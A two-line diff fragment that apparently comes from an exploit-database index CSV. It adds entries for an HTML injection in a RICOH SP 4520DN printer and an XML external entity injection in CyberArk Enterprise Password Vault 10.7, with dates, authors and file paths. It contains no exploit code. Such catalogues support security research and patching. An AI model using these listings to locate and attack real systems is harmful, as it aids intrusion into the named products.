+46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware, +46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,